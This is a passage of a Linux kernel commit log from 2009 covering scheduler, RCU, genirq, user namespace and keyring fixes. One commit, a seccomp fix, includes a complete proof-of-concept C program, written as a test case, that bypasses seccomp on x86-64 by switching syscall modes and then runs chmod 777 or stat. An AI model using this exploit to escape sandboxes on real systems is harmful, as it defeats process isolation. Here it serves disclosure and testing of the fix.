So on each tick we process this pointless softirq.

This patch fixes it by checking whether we are attached to the NULL domain before raising the softirq. Another possible fix would be to set rq->next_balance to the maximal possible jiffies value if we are attached to the NULL domain.

v2: build fix on UP

Signed-off-by: Frederic Weisbecker <fweisbec@gmail.com>
Cc: Steven Rostedt <rostedt@goodmis.org>
Cc: Peter Zijlstra <peterz@infradead.org>
LKML-Reference: <49af242d.1c07d00a.32d5.ffffc019@mx.google.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
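One way to express that check (a sketch along the lines described above; the helper name may differ from the actual patch):

    /* True when this CPU hangs off the NULL sched domain (UP box, SMP kernel). */
    static inline int on_null_domain(int cpu)
    {
            return !rcu_dereference(cpu_rq(cpu)->sd);
    }

    static inline void trigger_load_balance(struct rq *rq, int cpu)
    {
            /* ... nohz idle-balancing handling elided ... */
            if (time_after_eq(jiffies, rq->next_balance) &&
                likely(!on_null_domain(cpu)))
                    raise_softirq(SCHED_SOFTIRQ);
    }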
-
Submitted by Eric Dumazet

If a machine is flooded by network frames, a cpu can loop 100% of its time inside ksoftirqd() without calling schedule(). This can delay the RCU grace period to insane values.

Adding an rcu_qsctr_inc() call in ksoftirqd() solves this problem.

Paul: "This regression was a result of the recent change from "schedule()" to "cond_resched()", which got rid of that quiescent state in the common case where a reschedule is not needed."

Signed-off-by: Eric Dumazet <dada1@cosmosbay.com>
Reviewed-by: Paul E. McKenney <paulmck@linux.vnet.ibm.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
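In the ksoftirqd() main loop this amounts to reporting a quiescent state on every iteration, roughly as below (a condensed sketch; offline-CPU handling and the outer loop are elided):

    static int ksoftirqd(void *__bind_cpu)
    {
            /* ... */
            while (local_softirq_pending()) {
                    preempt_disable();
                    do_softirq();
                    preempt_enable_no_resched();
                    cond_resched();

                    /* Even if cond_resched() never schedules, tell RCU this CPU
                     * passed through a quiescent state so grace periods progress. */
                    preempt_disable();
                    rcu_qsctr_inc((long)__bind_cpu);
                    preempt_enable();
            }
            /* ... */
            return 0;
    }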
-
- 03 March 2009, 2 commits
-
-
Submitted by Roland McGrath

On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with ljmp, and then use the "syscall" instruction to make a 64-bit system call. A 64-bit process can make a 32-bit system call with int $0x80. In both of these cases, under CONFIG_SECCOMP=y, secure_computing() will use the wrong system call number table. The fix is simple: test TS_COMPAT instead of TIF_IA32. Here is an example exploit:

/* test case for seccomp circumvention on x86-64

   There are two failure modes: compile with -m64 or compile with -m32.

   The -m64 case is the worst one, because it does "chmod 777 ." (could
   be any chmod call). The -m32 case demonstrates it was able to do
   stat(), which can glean information but not harm anything directly.

   A buggy kernel will let the test do something, print, and exit 1; a
   fixed kernel will make it exit with SIGKILL before it does anything. */

#define _GNU_SOURCE
#include <assert.h>
#include <inttypes.h>
#include <stdio.h>
#include <linux/prctl.h>
#include <sys/stat.h>
#include <unistd.h>
#include <asm/unistd.h>

int
main (int argc, char **argv)
{
  char buf[100];
  static const char dot[] = ".";
  long ret;
  unsigned st[24];

  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

#ifdef __x86_64__
  assert ((uintptr_t) dot < (1UL << 32));
  asm ("int $0x80 # %0 <- %1(%2 %3)"
       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
  ret = snprintf (buf, sizeof buf,
                  "result %ld (check mode on .!)\n", ret);
#elif defined __i386__
  asm (".code32\n"
       "pushl %%cs\n"
       "pushl $2f\n"
       "ljmpl $0x33, $1f\n"
       ".code64\n"
       "1: syscall # %0 <- %1(%2 %3)\n"
       "lretl\n"
       ".code32\n"
       "2:"
       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
  if (ret == 0)
    ret = snprintf (buf, sizeof buf,
                    "stat . -> st_uid=%u\n", st[7]);
  else
    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
#else
# error "not this one"
#endif

  write (1, buf, ret);
  syscall (__NR_exit, 1);
  return 2;
}

Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
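The fix itself boils down to choosing the syscall-number table based on how this particular system call was entered (TS_COMPAT) rather than on the process's static TIF_IA32 flag; in sketch form (table and surrounding code abridged):

    /* inside the seccomp mode-1 check on x86 */
    int *allowed = mode1_syscalls;           /* 64-bit table by default */

    #ifdef CONFIG_COMPAT
    /* TS_COMPAT reflects the entry path of *this* syscall (int $0x80 vs.
     * syscall), unlike TIF_IA32 which only describes the process. */
    if (task_thread_info(current)->status & TS_COMPAT)
            allowed = mode1_syscalls_32;     /* 32-bit table */
    #endif

    /* ... this_syscall is then compared against the allowed list ... */

-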
Submitted by Peter Zijlstra

Make sure the genirq layer handlers are indeed running handlers in hardirq context. That is the genirq expectation, and doing anything else is broken.

Signed-off-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
Cc: Andrew Morton <akpm@linux-foundation.org>
LKML-Reference: <1236006812.5330.632.camel@laptop>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
-
- 02 March 2009, 1 commit
-
-
Submitted by Wang Chen

Impact: micro-optimization

The parameter "prev" is not really used.

Signed-off-by: Wang Chen <wangchen@cn.fujitsu.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
-
- 28 February 2009, 1 commit
-
-
Submitted by David Howells

free_uid() and free_user_ns() are corecursive when CONFIG_USER_SCHED=n, but free_user_ns() is called from free_uid() by way of uid_hash_remove(), which requires uidhash_lock to be held. free_user_ns() then calls free_uid() to complete the destruction.

Fix this by deferring the destruction of the user_namespace.

Signed-off-by: David Howells <dhowells@redhat.com>
Acked-by: Serge Hallyn <serue@us.ibm.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
-
- 27 February 2009, 2 commits
-
-
Submitted by Dhaval Giani

Impact: fix hung task with certain (non-default) rt-limit settings

Corey Hickey reported that on using setuid to change the uid of an rt process, the process would be unkillable and would not run. This is because there was no rt runtime for that user group.

Add a check to see whether a user can attach an rt task to its task group. On failure, return EINVAL, which is also what is returned under CONFIG_CGROUP_SCHED.

Reported-by: Corey Hickey <bugfood-ml@fatooh.org>
Signed-off-by: Dhaval Giani <dhaval@linux.vnet.ibm.com>
Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
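Conceptually, the added check has this shape (a sketch only; "tg" stands for the task group the task would end up in after the uid change, and the exact placement in the setuid path differs):

    /* An RT task must not be attached to a task group with no RT runtime,
     * otherwise it could never run again. */
    if (rt_task(tsk) && tg->rt_bandwidth.rt_runtime == 0)
            return -EINVAL;         /* same error as the CONFIG_CGROUP_SCHED case */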
-
Submitted by Serge E. Hallyn

Per-uid keys were looked up by uid only. Use the user namespace to distinguish the same uid in different namespaces.

This does not address key_permission, so a task can, for instance, try to join a keyring owned by the same uid in another namespace. That will be handled by a separate patch.

Signed-off-by: Serge E. Hallyn <serue@us.ibm.com>
Acked-by: David Howells <dhowells@redhat.com>
Signed-off-by: James Morris <jmorris@namei.org>
-